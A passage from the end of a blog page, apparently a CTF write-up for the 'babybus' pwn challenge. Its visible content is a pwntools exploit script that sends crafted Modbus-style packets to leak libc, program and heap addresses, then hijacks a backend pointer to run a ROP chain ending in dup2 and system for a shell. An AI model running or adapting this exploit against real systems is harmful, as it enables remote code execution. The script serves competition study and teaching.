    <span class="n">pak</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x01\x03</span><span class="sh">'</span> <span class="o">+</span> <span class="n">addr</span><span class="p">.</span><span class="nf">to_bytes</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="sh">'</span><span class="s">big</span><span class="sh">'</span><span class="p">)</span> <span class="o">+</span> <span class="n">quant</span><span class="p">.</span><span class="nf">to_bytes</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="sh">'</span><span class="s">big</span><span class="sh">'</span><span class="p">)</span>
    <span class="n">pak</span> <span class="o">+=</span> <span class="nf">crc_bytes</span><span class="p">(</span><span class="n">pak</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">pak</span>

<span class="k">def</span> <span class="nf">func10</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">quant</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span>
    <span class="n">pak</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x01\x10</span><span class="sh">'</span> <span class="o">+</span> <span class="n">addr</span><span class="p">.</span><span class="nf">to_bytes</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="sh">'</span><span class="s">big</span><span class="sh">'</span><span class="p">)</span> <span class="o">+</span> <span class="n">quant</span><span class="p">.</span><span class="nf">to_bytes</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="sh">'</span><span class="s">big</span><span class="sh">'</span><span class="p">)</span>
    <span class="n">pak</span> <span class="o">+=</span> <span class="p">(</span><span class="n">quant</span><span class="o">*</span><span class="mi">2</span><span class="p">).</span><span class="nf">to_bytes</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">pak</span> <span class="o">+=</span> <span class="n">data</span> <span class="c1"># for func03
</span>    <span class="c1"># for i in range(quant):
</span>        <span class="c1"># pak += data[i*2:i*2+2][::-1]
</span>    <span class="n">pak</span> <span class="o">+=</span> <span class="nf">crc_bytes</span><span class="p">(</span><span class="n">pak</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">pak</span>

<span class="k">def</span> <span class="nf">pwn</span><span class="p">():</span>

    <span class="c1"># leak
</span>
    <span class="nf">s</span><span class="p">(</span><span class="nf">func03</span><span class="p">(</span><span class="mh">0xff9f</span><span class="p">,</span> <span class="mh">0x70</span><span class="p">))</span>

    <span class="n">mes</span> <span class="o">=</span> <span class="nf">r</span><span class="p">()</span>
    <span class="n">data</span> <span class="o">=</span> <span class="nf">resolve_pak</span><span class="p">(</span><span class="n">mes</span><span class="p">)</span>

    <span class="n">libc_base</span> <span class="o">=</span> <span class="nf">unpack</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">8</span><span class="p">])</span><span class="o">-</span><span class="mh">0x203b60</span>
    <span class="nf">success</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">[*] libc_base: </span><span class="si">{</span><span class="nf">hex</span><span class="p">(</span><span class="n">libc_base</span><span class="p">)</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

    <span class="n">prog_base</span> <span class="o">=</span> <span class="nf">unpack</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mh">0xa8</span><span class="p">:</span><span class="mh">0xa8</span><span class="o">+</span><span class="mi">8</span><span class="p">])</span><span class="o">-</span><span class="mh">0x9ea35e</span>
    <span class="nf">success</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">[*] prog_base: </span><span class="si">{</span><span class="nf">hex</span><span class="p">(</span><span class="n">prog_base</span><span class="p">)</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

    <span class="n">heap_base</span> <span class="o">=</span> <span class="nf">unpack</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mh">0x10</span><span class="p">:</span><span class="mh">0x18</span><span class="p">])</span><span class="o">-</span><span class="mh">0xa4270</span>
    <span class="nf">success</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">[*] heap_base: </span><span class="si">{</span><span class="nf">hex</span><span class="p">(</span><span class="n">heap_base</span><span class="p">)</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

    <span class="c1"># hijack ptr in opaque
</span>
    <span class="c1"># 0x2d5960: CharBackend offset from heap
</span>    <span class="c1"># 0x83c30: 0xf8 buffer
</span>    <span class="c1"># 0x84750: opaque
</span>
    <span class="n">char_backend</span> <span class="o">=</span> <span class="n">heap_base</span> <span class="o">+</span> <span class="mh">0x2d5960</span>
    <span class="c1"># one_gadget = libc_base + 0xef4ce
</span>
    <span class="c1"># 0x000000000016bde0 : push rax ; pop rsp ; lea rsi, [rax + 0x48] ; mov rax, qword ptr [rdi + 8] ; jmp qword ptr [rax + 0x18]
</span>    <span class="c1"># 0x000000000002882f : ret
</span>    <span class="c1"># 0x00000000000dd237 : pop rax ; ret
</span>    <span class="c1"># 0x000000000010f78b : pop rdi ; ret
</span>    <span class="c1"># 0x0000000000110a7d : pop rsi ; ret
</span>
    <span class="n">payload</span> <span class="o">=</span> <span class="nf">flat</span><span class="p">([</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0xdd237</span><span class="p">,</span>
        <span class="n">heap_base</span> <span class="o">+</span> <span class="mh">0x2d6c50</span> <span class="o">+</span> <span class="mh">0x10</span> <span class="o">-</span> <span class="mh">0x18</span><span class="p">,</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x2882f</span><span class="p">,</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x10f78b</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x110a7d</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="n">libc</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="sh">"</span><span class="s">dup2</span><span class="sh">"</span><span class="p">],</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x10f78b</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x110a7d</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="n">libc</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="sh">"</span><span class="s">dup2</span><span class="sh">"</span><span class="p">],</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x10f78b</span><span class="p">,</span> <span class="n">prog_base</span> <span class="o">+</span> <span class="mh">0xD8A7D7</span><span class="p">,</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x2882f</span><span class="p">,</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="n">libc</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="sh">"</span><span class="s">system</span><span class="sh">"</span><span class="p">]</span>
    <span class="p">])</span>
    <span class="nf">s</span><span class="p">(</span><span class="nf">func10</span><span class="p">(</span><span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x6c</span><span class="p">,</span> <span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="se">\0</span><span class="sh">'</span><span class="o">*</span><span class="mh">0x11</span> <span class="o">+</span> <span class="n">payload</span><span class="p">).</span><span class="nf">ljust</span><span class="p">(</span><span class="mh">0x6c</span><span class="o">*</span><span class="mi">2</span><span class="p">,</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\0</span><span class="sh">'</span><span class="p">)))</span>
    <span class="nf">s</span><span class="p">(</span><span class="nf">func03</span><span class="p">(</span><span class="mh">0x2</span><span class="p">,</span> <span class="mh">0x69</span><span class="p">))</span>

    <span class="n">hijack_rip</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x16bde0</span>
    <span class="n">hijack_rdi_rax</span> <span class="o">=</span> <span class="n">heap_base</span> <span class="o">+</span> <span class="mh">0x2d6c50</span>

    <span class="nf">s</span><span class="p">(</span><span class="nf">func10</span><span class="p">(</span><span class="mh">0xfff1</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="se">\0</span><span class="sh">'</span><span class="o">+</span><span class="nf">p64</span><span class="p">(</span><span class="n">char_backend</span><span class="p">)</span><span class="o">+</span><span class="nf">flat</span><span class="p">([</span><span class="mi">0</span><span class="p">,</span> <span class="n">hijack_rip</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">hijack_rdi_rax</span><span class="p">])).</span><span class="nf">ljust</span><span class="p">(</span><span class="mh">0x20</span><span class="o">*</span><span class="mi">2</span><span class="p">,</span><span class="sa">b</span><span class="sh">'</span><span class="se">\0</span><span class="sh">'</span><span class="p">)))</span>
    <span class="nf">s</span><span class="p">(</span><span class="nf">func03</span><span class="p">(</span><span class="mh">0xfa17</span><span class="p">,</span> <span class="mh">0x5f4</span><span class="p">))</span>

    <span class="nf">r</span><span class="p">()</span>

    <span class="n">io</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>


<span class="c1"># ------------------ Infrastructure ------------------ #
</span>
<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="sh">"</span><span class="s">__main__</span><span class="sh">"</span><span class="p">:</span>
    <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">[*] Cameudis</span><span class="sh">'</span><span class="s">s PWN Framework</span><span class="sh">"</span><span class="p">)</span>
    <span class="n">io</span> <span class="o">=</span> <span class="nf">remote</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span>
    <span class="nf">pwn</span><span class="p">()</span>

</code></pre></div></div>

          </div>
        </div>

        




  

  
    <section class="related-posts">
      <h3 class="related-posts-title">RELATED POSTS</h3>
      <div class="related-posts-list">
        
    
      
        
        
        

        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
          <div class="related-post-item">
            <span class="related-post-date">[ 2026-05-26 ]</span>
            <a href="/2026/05/26/CTF-Dot.html" class="related-post-link">CTF 的句点</a>
            <span class="common-tags"> #pwn</span>
          </div>
          
          
        
      
    
      
        
        
        

        
      
    
      
    
      
        
        
        

        
          <div class="related-post-item">
            <span class="related-post-date">[ 2025-10-11 ]</span>
            <a href="/2025/10/11/MidnightSunFinal-2025-Flop.html" class="related-post-link">Midnight Sun CTF 2025 Final - flop</a>
            <span class="common-tags"> #pwn</span>
          </div>
          
          
        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
          <div class="related-post-item">
            <span class="related-post-date">[ 2025-04-11 ]</span>
            <a href="/2025/04/11/SJTUCTF-2025.html" class="related-post-link">SJTU CTF 2025 PWN Writeup</a>
            <span class="common-tags"> #pwn</span>
          </div>
          
          
            
  
      </div>
    </section>
  



        <div id="comments" class="post-comments"
  data-valine-url="https://unpkg.com/valine@1.5.3/dist/Valine.min.js"
  data-app-id="Ji5y9HTOlb2QGDO0XFlWXNRy-gzGzoHsz"
  data-app-key="6VqGye1352LX381YQDTOaiXs"
  data-placeholder="El Psy Congroo">
  <button class="comments-load" type="button">LOAD_COMMENTS</button>
</div>
<script src="/assets/js/comments.js" defer></script>


        <a class="u-url" href="/2025/11/11/QWB-Qual-2025-babybus.html" hidden></a>
</article>

<script src="/assets/js/post.js?v=20260716-mermaid"
        data-external-icon-manifest="/assets/external-link-icons/manifest.json"
        defer></script>



    </div>
  </main><footer class="site-footer h-card">
  <data class="u-url" href="/%20/"></data>
  <div class="wrapper">
    <div class="footer-header">
      <h2 class="footer-heading">[ Y²的博客 ]</h2>
      <p class="footer-status">STATUS: ONLINE / UPTIME: <span id="site-uptime">∞</span></p>
    </div>

    <div class="footer-layout">
      <!-- Col 1: Contact -->
      <div class="footer-col">
        <div class="footer-title">CONTACT_INFO</div>
        <div class="footer-content">
          <p class="p-name">Y² (aka.cameudis)</p><a class="u-email" href="mailto:cameudis@gmail.com">cameudis@gmail.com</a></div>
      </div>

      <!-- Col 2: Social Links -->
      <div class="footer-col">
        <div class="footer-title">SOCIAL_NETWORKS</div>
        <div class="footer-content"><ul class="social-media-list"><li><a href="https://github.com/cameudis"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">cameudis</span></a></li><li><a href="https://twitter.com/cameudis"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">cameudis</span></a></li></ul></div>
      </div>

      <!-- Col 3: Visitor Map -->
      <div class="footer-col">
        <div class="footer-title">VISITOR_MAP</div>
        <div class="footer-map-mini"
          data-map-src="https://mapmyvisitors.com/map.js?d=VEk4VYKnI9sCCEXCgdKor_rhcYKrCEm6C9mIRceo1og&amp;cl=ffffff&amp;w=a"></div>
      </div>
    </div>

    <div class="footer-bottom">
      <p class="quiet-humor">/* Free and useless. */</p>
      <div style="margin-bottom: 20px;">
        <img src="https://blog-1308958542.cos.ap-shanghai.myqcloud.com/20251230224502598.gif" alt="badge" width="88"
          height="31" loading="lazy" decoding="async">
      </div>
      <p>&copy; 2026 Y² (aka.cameudis)</p>
    </div>
  </div>
</footer>
<script src="/assets/js/footer.js?v=20260715-3" defer></script>
</body>

</html>
